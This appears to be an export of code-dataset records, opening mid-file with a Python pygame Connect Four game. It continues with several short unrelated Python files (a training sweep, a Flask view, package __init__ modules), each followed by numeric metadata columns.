    """Redraw the whole game window: frame, grid, column labels and discs.

    Colours: '1' -> RED disc, '2' -> YELLOW disc, '0' -> WHITE (empty).
    NOTE(review): pygame.init()/display.init() are re-run and the font is
    re-loaded on every call — harmless but wasteful; kept as-is.
    """
    pygame.init()
    pygame.display.init()
    FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE)
    self.window.window.fill(BACKGROUND_COLOR)
    # Board background rectangle, centred in the window.
    pygame.draw.polygon(self.window.window, BOARD_COLOR, (((WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2), (BOARDWIDTH + (WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2), (BOARDWIDTH + (WINDOWWIDTH - BOARDWIDTH) / 2, BOARDHEIGHT + (WINDOWHEIGHT - BOARDHEIGHT) / 2), ((WINDOWWIDTH - BOARDWIDTH) / 2, BOARDHEIGHT + (WINDOWHEIGHT - BOARDHEIGHT) / 2)))
    # White strip across the top row, where the column numbers are drawn.
    pygame.draw.polygon(self.window.window, WHITE, (((WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2), (BOARDWIDTH + (WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2), (BOARDWIDTH + (WINDOWWIDTH - BOARDWIDTH) / 2, BOARDHEIGHT / 7 + (WINDOWHEIGHT - BOARDHEIGHT) / 2), ((WINDOWWIDTH - BOARDWIDTH) / 2, BOARDHEIGHT / 7 + (WINDOWHEIGHT - BOARDHEIGHT) / 2)))
    for i in range(8):
        # Grid: 8 horizontal and 8 vertical separator lines.
        pygame.draw.line(self.window.window, BLACK, ((WINDOWWIDTH - BOARDWIDTH) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2 + i * BOARDHEIGHT / 7), ((WINDOWWIDTH - BOARDWIDTH) / 2 + BOARDWIDTH, (WINDOWHEIGHT - BOARDHEIGHT) / 2 + i * BOARDHEIGHT / 7), 2)
        pygame.draw.line(self.window.window, BLACK, ((WINDOWWIDTH - BOARDWIDTH) / 2 + i * BOARDWIDTH / 7, (WINDOWHEIGHT - BOARDHEIGHT) / 2 ), ((WINDOWWIDTH - BOARDWIDTH) / 2 + i * BOARDWIDTH / 7, (WINDOWHEIGHT - BOARDHEIGHT) / 2 + BOARDHEIGHT), 2)
    for i in range(7):
        # Column number labels.  (The original also built an unused centred
        # Rect here each iteration; it has been removed.)
        text = FONT.render(str(i), True, BLACK, WHITE)
        self.window.window.blit(text, ((WINDOWWIDTH - BOARDWIDTH) / 2 + i * BOARDWIDTH / 7 + (BOARDWIDTH / 7 - TEXT_SIZE / 2) / 2, (WINDOWHEIGHT - BOARDHEIGHT) / 2 + (BOARDHEIGHT / 7 - TEXT_SIZE) / 2))
    for i in range(6):
        for j in range(7):
            # Disc centre for cell (i, j); rows are shifted one square down
            # because row 0 of the window holds the column labels.
            center = (int(X_MARGIN + j * BOARDWIDTH / 7 + BOARDWIDTH / (7 * 2)), int(Y_MARGIN + (i + 1) * BOARDHEIGHT / 7 + BOARDHEIGHT / (7 * 2)))
            if (self.board[i][j] == '1'):
                pygame.draw.circle(self.window.window, RED, center, DISC_RADIUS, 0)
            elif (self.board[i][j] == '2'):
                pygame.draw.circle(self.window.window, YELLOW, center, DISC_RADIUS, 0)
            elif (self.board[i][j] == '0'):
                pygame.draw.circle(self.window.window, WHITE, center, DISC_RADIUS, 0)
    pygame.display.update()
def draw_choose_first_move2(self):
    """Open a temporary half-size window asking who moves first; block until clicked.

    Clicking 'Player' sets self.color = -1 and self.side_to_move = 42
    (human moves first); clicking 'Computer' sets self.color = 1 and
    self.side_to_move = -42.  The temporary window is closed on exit.
    """
    WINDOWHEIGHT_FIRST_MOVE = WINDOWHEIGHT // 2
    WINDOWWIDTH_FIRST_MOVE = WINDOWWIDTH // 2
    TEXT_SIZE_FIRST_MOVE = 16
    first_move_window = pygame.display.set_mode((WINDOWWIDTH_FIRST_MOVE, WINDOWHEIGHT_FIRST_MOVE))
    pygame.display.set_caption("Four in a row")
    FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE_FIRST_MOVE)
    first_move_window.fill(BACKGROUND_COLOR)
    text_choose = FONT.render("Choose who moves first: ", True, BLACK, WHITE)
    textRect_choose = text_choose.get_rect()
    textRect_choose.centerx = first_move_window.get_rect().centerx
    textRect_choose.centery = first_move_window.get_rect().centery
    first_move_window.blit(text_choose, (WINDOWWIDTH_FIRST_MOVE // 4, WINDOWHEIGHT_FIRST_MOVE // 4))
    text_player = FONT.render("Player ", True, BLACK, WHITE)
    text_player_rect = text_player.get_rect()
    #text_player_rect.centerx = first_move_window.get_rect().centerx
    #text_player_rect.centery = first_move_window.get_rect().centery
    # Clickable rectangle centred on where the "Player" label is blitted.
    text_player_rect.centerx = WINDOWWIDTH_FIRST_MOVE // 4 + text_player_rect.w / 2
    text_player_rect.centery = WINDOWHEIGHT_FIRST_MOVE // 2 + text_player_rect.h / 2
    first_move_window.blit(text_player, (WINDOWWIDTH_FIRST_MOVE // 4, WINDOWHEIGHT_FIRST_MOVE // 2))
    text_computer = FONT.render("Computer", True, BLACK, WHITE)
    text_computer_rect = text_computer.get_rect()
    # Clickable rectangle centred on where the "Computer" label is blitted.
    text_computer_rect.centerx = WINDOWWIDTH_FIRST_MOVE // 2 + text_computer_rect.w / 2
    text_computer_rect.centery = WINDOWHEIGHT_FIRST_MOVE // 2 + text_computer_rect.h / 2
    first_move_window.blit(text_computer, (WINDOWWIDTH_FIRST_MOVE // 2, WINDOWHEIGHT_FIRST_MOVE // 2))
    no_input = True
    #print(text_player_rect.top, text_player_rect.bottom, text_player_rect.left, text_player_rect.right, text_player_rect.topleft)
    # NOTE(review): stray debug print left in place to preserve behaviour.
    print(text_player_rect.topleft, text_player_rect.bottomright)
    while (no_input):
        for event in pygame.event.get():
            if event.type == pygame.locals.QUIT:
                pygame.quit()
                sys.exit()
            elif (event.type == pygame.locals.MOUSEBUTTONUP and event.button == 1):
                cursor_x = pygame.mouse.get_pos()[0]
                cursor_y = pygame.mouse.get_pos()[1]
                if (text_player_rect.collidepoint(cursor_x, cursor_y)):
                    self.color = -1
                    self.side_to_move = 42
                    no_input = False
                if (text_computer_rect.collidepoint(cursor_x, cursor_y)):
                    self.color = 1
                    self.side_to_move = -42
                    no_input = False
        pygame.display.update()
        time.sleep(0.1)  # throttle the polling loop
    pygame.display.quit()
    #pygame.quit()
def draw_choose_first_move(self):
    """Draw the who-moves-first prompt in the main window; block until clicked.

    Same contract as draw_choose_first_move2() but reuses self.window
    instead of opening a temporary window: clicking 'Player' sets
    self.color = -1 and self.side_to_move = 42; clicking 'Computer' sets
    self.color = 1 and self.side_to_move = -42.
    """
    pygame.display.set_caption("Four in a row")
    FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE_FIRST_MOVE)
    self.window.window.fill(BACKGROUND_COLOR)
    text_choose = FONT.render("Choose who moves first: ", True, BLACK, WHITE)
    textRect_choose = text_choose.get_rect()
    textRect_choose.centerx = self.window.window.get_rect().centerx
    textRect_choose.centery = self.window.window.get_rect().centery
    self.window.window.blit(text_choose, (WINDOWWIDTH // 4, WINDOWHEIGHT // 3))
    text_player = FONT.render("Player ", True, BLACK, WHITE)
    text_player_rect = text_player.get_rect()
    # text_player_rect.centerx = first_move_window.get_rect().centerx
    # text_player_rect.centery = first_move_window.get_rect().centery
    # Clickable rectangle centred on where the "Player" label is blitted.
    text_player_rect.centerx = WINDOWWIDTH // 4 + text_player_rect.w / 2
    text_player_rect.centery = WINDOWHEIGHT // 2 + text_player_rect.h / 2
    self.window.window.blit(text_player, (WINDOWWIDTH // 4, WINDOWHEIGHT // 2))
    text_computer = FONT.render("Computer", True, BLACK, WHITE)
    text_computer_rect = text_computer.get_rect()
    # Clickable rectangle centred on where the "Computer" label is blitted.
    text_computer_rect.centerx = WINDOWWIDTH // 2 + text_computer_rect.w / 2
    text_computer_rect.centery = WINDOWHEIGHT // 2 + text_computer_rect.h / 2
    self.window.window.blit(text_computer, (WINDOWWIDTH // 2, WINDOWHEIGHT // 2))
    no_input = True
    # print(text_player_rect.top, text_player_rect.bottom, text_player_rect.left, text_player_rect.right, text_player_rect.topleft)
    #print(text_player_rect.topleft, text_player_rect.bottomright)
    while (no_input):
        for event in pygame.event.get():
            if event.type == pygame.locals.QUIT:
                pygame.quit()
                sys.exit()
            elif (event.type == pygame.locals.MOUSEBUTTONUP and event.button == 1):
                cursor_x = pygame.mouse.get_pos()[0]
                cursor_y = pygame.mouse.get_pos()[1]
                #print("clicked at ({}, {})".format(cursor_x, cursor_y))
                if (text_player_rect.collidepoint(cursor_x, cursor_y)):
                    # print("player!!!")
                    self.color = -1
                    self.side_to_move = 42
                    no_input = False
                if (text_computer_rect.collidepoint(cursor_x, cursor_y)):
                    # print("computer!!!")
                    self.color = 1
                    self.side_to_move = -42
                    no_input = False
        pygame.display.update()
        time.sleep(0.1)  # throttle the polling loop
    #pygame.display.quit()
    # pygame.quit()
def show_game_result(self):
    """Render the end-of-game caption above the board and set the window title.

    Maps check_is_finished()'s winner code (1 or 2) through self.color
    (+1 = computer plays '1') to a "Computer won!"/"Player won!" caption.
    The original called check_is_finished() twice; the result is now
    cached in a local.
    """
    print("Game is finished!")
    result = self.check_is_finished()
    if result == 1:
        game_result_caption = "Computer won!" if self.color == 1 else "Player won!"
    elif result == 2:
        game_result_caption = "Computer won!" if self.color == -1 else "Player won!"
    else:
        # NOTE(review): every other result code (including a possible draw)
        # reports "Computer won!" — kept as-is to preserve behaviour, but
        # this looks wrong; confirm against check_is_finished().
        game_result_caption = "Computer won!"
    pygame.display.set_caption(game_result_caption)
    FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE_GAME_RESULT)
    text_game_result = FONT.render(game_result_caption, True, BLACK, WHITE)
    # (The original built a pygame.Rect and immediately overwrote it with
    # get_rect(); the dead assignment has been removed.  The centred rect is
    # still unused by the fixed-margin blit below.)
    text_game_result_rect = text_game_result.get_rect()
    text_game_result_rect.centerx = X_MARGIN // 2 #+ BOARDWIDTH // 2
    text_game_result_rect.centery = Y_MARGIN // 2 #+ BOARDHEIGHT // 2
    self.window.window.blit(text_game_result, (X_MARGIN, (Y_MARGIN - SQUARE_SIZE) // 2))
    pygame.display.update()
def show_play_again_dialog(self):
    """Draw the 'Play again?' prompt with Yes/No options; block until one is clicked.

    Clicking 'No' clears self.play_again; clicking 'Yes' simply returns.
    Closing the window quits the program.  The original assigned each
    clickable Rect twice (a hand-built pygame.Rect immediately overwritten
    by get_rect()); the dead first assignments have been removed.
    """
    FONT = pygame.font.Font('ubuntu.ttf', TEXT_SIZE_PLAY_AGAIN)
    text_play_again = FONT.render("Play again?", True, BLACK, WHITE)
    self.window.window.blit(text_play_again, (int(X_MARGIN * 1.1) + BOARDWIDTH, Y_MARGIN))
    text_yes = FONT.render("Yes", True, BLACK, WHITE)
    yes_rect = text_yes.get_rect()
    # Clickable rectangle centred on where the "Yes" label is blitted.
    text_yes_rect = text_yes.get_rect()
    text_yes_rect.centerx = X_MARGIN + BOARDWIDTH + BOARDWIDTH // (4 * 7) + yes_rect.w // 2
    text_yes_rect.centery = Y_MARGIN + BOARDHEIGHT // (7) + yes_rect.h // 2
    self.window.window.blit(text_yes, (X_MARGIN + BOARDWIDTH + BOARDWIDTH // (4 * 7), Y_MARGIN + BOARDHEIGHT // (7)))
    text_no = FONT.render("No", True, BLACK, WHITE)
    no_rect = text_no.get_rect()
    # Clickable rectangle centred on where the "No" label is blitted.
    text_no_rect = text_no.get_rect()
    text_no_rect.centerx = X_MARGIN + BOARDWIDTH + BOARDWIDTH * 0.2 + no_rect.w // 2
    text_no_rect.centery = Y_MARGIN + BOARDHEIGHT // (7) + no_rect.h // 2
    self.window.window.blit(text_no, (X_MARGIN + BOARDWIDTH + BOARDWIDTH * 0.2, Y_MARGIN + BOARDHEIGHT // (7)))
    pygame.display.update()
    no_input = True
    while (no_input):
        for event in pygame.event.get():
            if event.type == pygame.locals.QUIT:
                pygame.quit()
                sys.exit()
            elif (event.type == pygame.locals.MOUSEBUTTONUP and event.button == 1):
                cursor_x = pygame.mouse.get_pos()[0]
                cursor_y = pygame.mouse.get_pos()[1]
                if (text_yes_rect.collidepoint(cursor_x, cursor_y)):
                    no_input = False
                elif (text_no_rect.collidepoint(cursor_x, cursor_y)):
                    self.play_again = False
                    no_input = False
def change_end_game_caption(self):
    """Set the window caption to the game result (caption-only variant of
    show_game_result; the mapping logic is intentionally identical).

    The original called check_is_finished() twice; the result is now
    cached in a local.
    """
    print("Game is finished!")
    result = self.check_is_finished()
    if result == 1:
        game_result_caption = "Computer won!" if self.color == 1 else "Player won!"
    elif result == 2:
        game_result_caption = "Computer won!" if self.color == -1 else "Player won!"
    else:
        # NOTE(review): any other result code (including a possible draw)
        # reports "Computer won!" — kept to preserve behaviour; confirm.
        game_result_caption = "Computer won!"
    pygame.display.set_caption(game_result_caption)
def get_input(self):
    """Block until the user left-clicks inside the board's input strip;
    return the clicked column as a 0-based index.

    Spins on the pygame event queue: a window-close event terminates the
    program; a left-button MOUSEBUTTONUP inside the accepted region is
    converted to a column index via SQUARE_SIZE.
    """
    no_input = True
    while(no_input):
        for event in pygame.event.get():
            if event.type == pygame.locals.QUIT:
                pygame.quit()
                sys.exit()
            elif (event.type == pygame.locals.MOUSEBUTTONUP and event.button == 1):
                cursor_x = pygame.mouse.get_pos()[0]
                cursor_y = pygame.mouse.get_pos()[1]
                # NOTE(review): clicks are only accepted in a strip of
                # height BOARDHEIGHT/7 below Y_MARGIN -- confirm that
                # clicking anywhere in a column was not intended.
                if ((cursor_x > X_MARGIN) and (cursor_x < BOARDWIDTH + X_MARGIN) and (cursor_y > Y_MARGIN) and (cursor_y < (BOARDHEIGHT / (7) + Y_MARGIN))):
                    # column index; stays a float until the final int() cast
                    x_coord = (cursor_x - X_MARGIN) / SQUARE_SIZE
                    #y_coord = (cursor_y - Y_MARGIN) / SQUARE_SIZE
                    #print("clicked at {}".format(x_coord))
                    no_input = False
    # brief pause so the same release is not immediately re-processed
    time.sleep(0.1)
    #print("left while loop with x_coord = {}".format(int(x_coord)))
    #self.make_move_on_board(int(x_coord), -self.color)
    return int(x_coord)
def make_move(self):
    """Play one half-move: either apply the player's clicked column or
    run the computer's search, then advance move_number and toggle
    side_to_move.
    """
    #if (self.move_number == 42):
    #self.is_finished ==
    #print("entered make move!")
    # NOTE(review): side_to_move is toggled with "*= -1" below, so it can
    # equal 42 at most once (and only if initialised to 42 elsewhere).
    # Confirm this comparison is not meant to test against 1/-1.
    if (self.side_to_move == 42):#it's player turn
        input_move = self.get_input()
        #print("move received from input: {}".format(input_move))
        # an invalid click is silently ignored: neither counter advances,
        # so the caller ends up asking the player again
        if (str(input_move) in self.get_valid_moves()):
            self.make_move_on_board(input_move, -self.color)
            self.move_number += 1
            self.side_to_move *= -1
    else:#it's computer turn
        start_time = time.time()
        computer_move = self.root_search_negamax(self.color, MINIMAX_DEPTH, ALPHA_0, BETA_0)
        #computer_move = self.root_search_pvs(self.color, MINIMAX_DEPTH, ALPHA_0, BETA_0)
        #computer_move = random.randint(0, 6)
        self.make_move_on_board(computer_move, self.color)
        #print("made move {}".format(computer_move))
        #print("current board: {}".format(self.board))
        self.move_number += 1
        self.side_to_move *= -1
        end_time = time.time()
        print("computer thought for {} seconds".format(end_time - start_time))
def check_is_finished(self):
    """Scan the 6x7 board for a game-over condition.

    Returns:
        1 -- player '1' has four in a row
        2 -- player '2' has four in a row
        0 -- no winner yet and at least one empty ('0') square remains
        3 -- board full with no winner (draw)

    Replaces the original hand-enumerated window checks, one of which
    contained a typo: the '2' test for the diagonal starting at
    board[2][3] compared board[5][5] instead of board[4][5], so that
    win was never detected.
    """
    # (row step, col step): horizontal, vertical, "\" diagonal, "/" diagonal
    for d_row, d_col in ((0, 1), (1, 0), (1, 1), (-1, 1)):
        for row in range(6):
            for col in range(7):
                end_row = row + 3 * d_row
                end_col = col + 3 * d_col
                # skip windows that would run off the board
                if not (0 <= end_row < 6 and 0 <= end_col < 7):
                    continue
                window = {self.board[row + k * d_row][col + k * d_col] for k in range(4)}
                if window == {'1'}:
                    return 1
                if window == {'2'}:
                    return 2
    for board_row in self.board:  # returns 0 in case the node is not terminal
        if '0' in board_row:
            return 0
    return 3  # returns 3 in case the node is terminal (draw)
def main():
    """Run the game loop: alternate moves until a terminal position,
    show the result, and offer a rematch; quits via sys.exit() when the
    player declines.
    """
    random.seed()
    my_bot = Bot()
    my_bot.draw_choose_first_move()
    my_bot.draw_board()
    while (my_bot.play_again):
        while (not my_bot.is_finished):
            my_bot.make_move()
            my_bot.draw_board()
            if (my_bot.check_is_finished() != 0): break
        my_bot.show_game_result()
        my_bot.show_play_again_dialog()
        if (not my_bot.play_again):
            pygame.quit()
            # sys.exit() raises SystemExit, so the "break" the original
            # placed after it was unreachable and has been removed
            sys.exit()
        # rematch: start over with a fresh bot
        my_bot = Bot()
        my_bot.draw_choose_first_move()
        # NOTE(review): unlike the first game, the rematch does not call
        # draw_board() before the first make_move() -- confirm intended.
    time.sleep(5)
if __name__ == "__main__":
    main()
| 65.910663
| 385
| 0.601023
| 11,828
| 68,613
| 3.349679
| 0.022912
| 0.320293
| 0.101893
| 0.08208
| 0.871353
| 0.852701
| 0.82789
| 0.809692
| 0.783872
| 0.757824
| 0
| 0.066047
| 0.162127
| 68,613
| 1,040
| 386
| 65.974038
| 0.623128
| 0.095448
| 0
| 0.256188
| 0
| 0
| 0.016964
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033416
| false
| 0
| 0.006188
| 0.001238
| 0.063119
| 0.006188
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5708934c2a2912a9fae8abb3094316b7fcde4905
| 160
|
py
|
Python
|
MLPcluster/expBuildWd2.py
|
ryan75195/Deep-Learning
|
899e593cc8e8a7857b93b8d2885250e4b0cb76b6
|
[
"MIT"
] | null | null | null |
MLPcluster/expBuildWd2.py
|
ryan75195/Deep-Learning
|
899e593cc8e8a7857b93b8d2885250e4b0cb76b6
|
[
"MIT"
] | null | null | null |
MLPcluster/expBuildWd2.py
|
ryan75195/Deep-Learning
|
899e593cc8e8a7857b93b8d2885250e4b0cb76b6
|
[
"MIT"
] | null | null | null |
import train_model
# Sweep the third argument across three orders of magnitude while the
# first two arguments stay fixed.
# NOTE(review): the original comment said "resnet18", but the first
# argument passed below is 34 (presumably the ResNet depth, i.e.
# ResNet-34) -- confirm against train_model.run_experiment's signature.
#resnet18
train_model.run_experiment(34,1e-5,0.001)
train_model.run_experiment(34,1e-5,0.0001)
train_model.run_experiment(34,1e-5,0.00001)
| 20
| 43
| 0.8125
| 31
| 160
| 3.967742
| 0.419355
| 0.325203
| 0.317073
| 0.560976
| 0.707317
| 0.707317
| 0.707317
| 0.707317
| 0
| 0
| 0
| 0.190789
| 0.05
| 160
| 7
| 44
| 22.857143
| 0.618421
| 0.05
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5719297863b93980c8c13ec6215ee8bdf1fb654a
| 95
|
py
|
Python
|
hemp/web/views/topology.py
|
nobuhikosekiya/sbx_multi_ios
|
9a8e540617d46fd98f466d89e1f9af4f8a1797aa
|
[
"MIT"
] | 64
|
2018-08-18T01:13:18.000Z
|
2021-12-09T17:46:35.000Z
|
hemp/web/views/topology.py
|
nobuhikosekiya/sbx_multi_ios
|
9a8e540617d46fd98f466d89e1f9af4f8a1797aa
|
[
"MIT"
] | 45
|
2018-08-16T21:26:11.000Z
|
2021-12-13T19:58:20.000Z
|
hemp/web/views/topology.py
|
nobuhikosekiya/sbx_multi_ios
|
9a8e540617d46fd98f466d89e1f9af4f8a1797aa
|
[
"MIT"
] | 37
|
2018-09-23T04:09:53.000Z
|
2021-11-11T16:39:37.000Z
|
from flask import render_template
def topology():
    """Render and return the topology page from its HTML template."""
    page = render_template('topology.html')
    return page
| 19
| 43
| 0.778947
| 12
| 95
| 6
| 0.75
| 0.388889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136842
| 95
| 4
| 44
| 23.75
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0.136842
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
57553400ee69c90f43af992089bdcdef8b989dd9
| 403
|
py
|
Python
|
seeq/addons/mps/__init__.py
|
seeq12/seeq-mps
|
aaa7bb6ffae2db3333c991edac64377aff6d8c24
|
[
"Apache-2.0"
] | 4
|
2021-11-17T00:18:04.000Z
|
2022-03-04T07:44:39.000Z
|
seeq/addons/mps/__init__.py
|
seeq12/seeq-mps
|
aaa7bb6ffae2db3333c991edac64377aff6d8c24
|
[
"Apache-2.0"
] | 1
|
2021-11-04T14:38:20.000Z
|
2021-11-12T06:05:33.000Z
|
seeq/addons/mps/__init__.py
|
seeq12/seeq-mps
|
aaa7bb6ffae2db3333c991edac64377aff6d8c24
|
[
"Apache-2.0"
] | null | null | null |
# Package façade: re-export the version, the MPS helper functions from
# the private _mps module, and the SDL user-interface class.
from ._version import __version__
from ._mps import load_ref, save_ref, pull_mps_data, seeq_mps_dtw_batch, push_mps_results_batch, seeq_mps_mass, \
    seeq_mps_dtw, push_mps_results
from ._mps_sdl_ui import MpsUI
# Names exported by "from seeq.addons.mps import *".
__all__ = ['__version__', 'load_ref', 'save_ref', 'pull_mps_data', 'seeq_mps_dtw_batch', 'push_mps_results_batch',
           'seeq_mps_mass', 'seeq_mps_dtw', 'push_mps_results', 'MpsUI']
| 50.375
| 114
| 0.774194
| 64
| 403
| 4.109375
| 0.296875
| 0.159696
| 0.152091
| 0.106464
| 0.714829
| 0.714829
| 0.714829
| 0.714829
| 0.714829
| 0.714829
| 0
| 0
| 0.119107
| 403
| 7
| 115
| 57.571429
| 0.740845
| 0
| 0
| 0
| 0
| 0
| 0.312655
| 0.054591
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
93c45644d1bf5172b15c746f7a5d010139cdacc0
| 396
|
py
|
Python
|
piudb/__init__.py
|
Peiiii/piudb
|
fb580fb4bb6004374095c9a4e4bab1eb24a33338
|
[
"MIT"
] | null | null | null |
piudb/__init__.py
|
Peiiii/piudb
|
fb580fb4bb6004374095c9a4e4bab1eb24a33338
|
[
"MIT"
] | null | null | null |
piudb/__init__.py
|
Peiiii/piudb
|
fb580fb4bb6004374095c9a4e4bab1eb24a33338
|
[
"MIT"
] | null | null | null |
__name__="piudb"
__author__ = "Wang Pei"
from .classes import (
InfoBody,TableManager,Table,Map,
Model,ModelMetaclass,Field,StringField,
IntegerField,BooleanField,TextField,FloatField,ObjectField,
Piu
)
__all__= [
'InfoBody','TableManager','Table','Map',
'Model','ModelMetaclass','Field','StringField',
'IntegerField','BooleanField','TextField','FloatField',
'Piu'
]
| 23.294118
| 63
| 0.714646
| 36
| 396
| 7.527778
| 0.638889
| 0.147601
| 0.184502
| 0.206642
| 0.782288
| 0.782288
| 0.782288
| 0.782288
| 0.782288
| 0.782288
| 0
| 0
| 0.126263
| 396
| 17
| 64
| 23.294118
| 0.783237
| 0
| 0
| 0
| 0
| 0
| 0.308081
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f50db3364b333b155eb6c24726a5a85be771d447
| 168
|
py
|
Python
|
tia/rlab/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 366
|
2015-01-21T21:57:23.000Z
|
2022-03-29T09:11:24.000Z
|
tia/rlab/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 51
|
2015-03-01T14:20:44.000Z
|
2021-08-19T15:46:51.000Z
|
tia/rlab/__init__.py
|
AmarisAI/tia
|
a7043b6383e557aeea8fc7112bbffd6e36a230e9
|
[
"BSD-3-Clause"
] | 160
|
2015-02-22T07:16:17.000Z
|
2022-03-29T13:41:15.000Z
|
# Monkey patch module
import tia.rlab.patch
from tia.rlab.components import *
from tia.rlab.table import *
from tia.rlab.builder import *
from tia.rlab.font import *
| 18.666667
| 33
| 0.767857
| 27
| 168
| 4.777778
| 0.407407
| 0.271318
| 0.341085
| 0.395349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 168
| 8
| 34
| 21
| 0.895833
| 0.113095
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f575f17488a954f2b84a89ca8b857bb93f0fdd70
| 163
|
py
|
Python
|
optimus/engines/dask_cudf/rows.py
|
ironmussa/Optimus
|
fbaea6e0957f0bc016280a85ff021904faac20c5
|
[
"Apache-2.0"
] | 1,045
|
2017-07-17T17:59:46.000Z
|
2021-06-15T07:06:48.000Z
|
optimus/engines/dask_cudf/rows.py
|
ironmussa/Optimus
|
fbaea6e0957f0bc016280a85ff021904faac20c5
|
[
"Apache-2.0"
] | 955
|
2017-07-14T15:47:58.000Z
|
2021-05-27T14:16:24.000Z
|
optimus/engines/dask_cudf/rows.py
|
ironmussa/Optimus
|
fbaea6e0957f0bc016280a85ff021904faac20c5
|
[
"Apache-2.0"
] | 226
|
2017-08-04T20:41:33.000Z
|
2021-05-21T08:28:33.000Z
|
from optimus.engines.base.cudf.rows import CUDFBaseRows
from optimus.engines.base.dask.rows import DaskBaseRows
class Rows(CUDFBaseRows, DaskBaseRows):
    """Row operations for the dask-cudf engine.

    All behaviour comes from the two mixin bases; by MRO, CUDFBaseRows
    methods take precedence over DaskBaseRows.
    """
    pass
| 23.285714
| 55
| 0.815951
| 21
| 163
| 6.333333
| 0.571429
| 0.165414
| 0.270677
| 0.330827
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110429
| 163
| 6
| 56
| 27.166667
| 0.917241
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
1947dda77c56a1ad0cd60d144491c80361fc0fde
| 38,854
|
py
|
Python
|
eeauditor/auditors/aws/Amazon_ECR_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/Amazon_ECR_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/Amazon_ECR_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
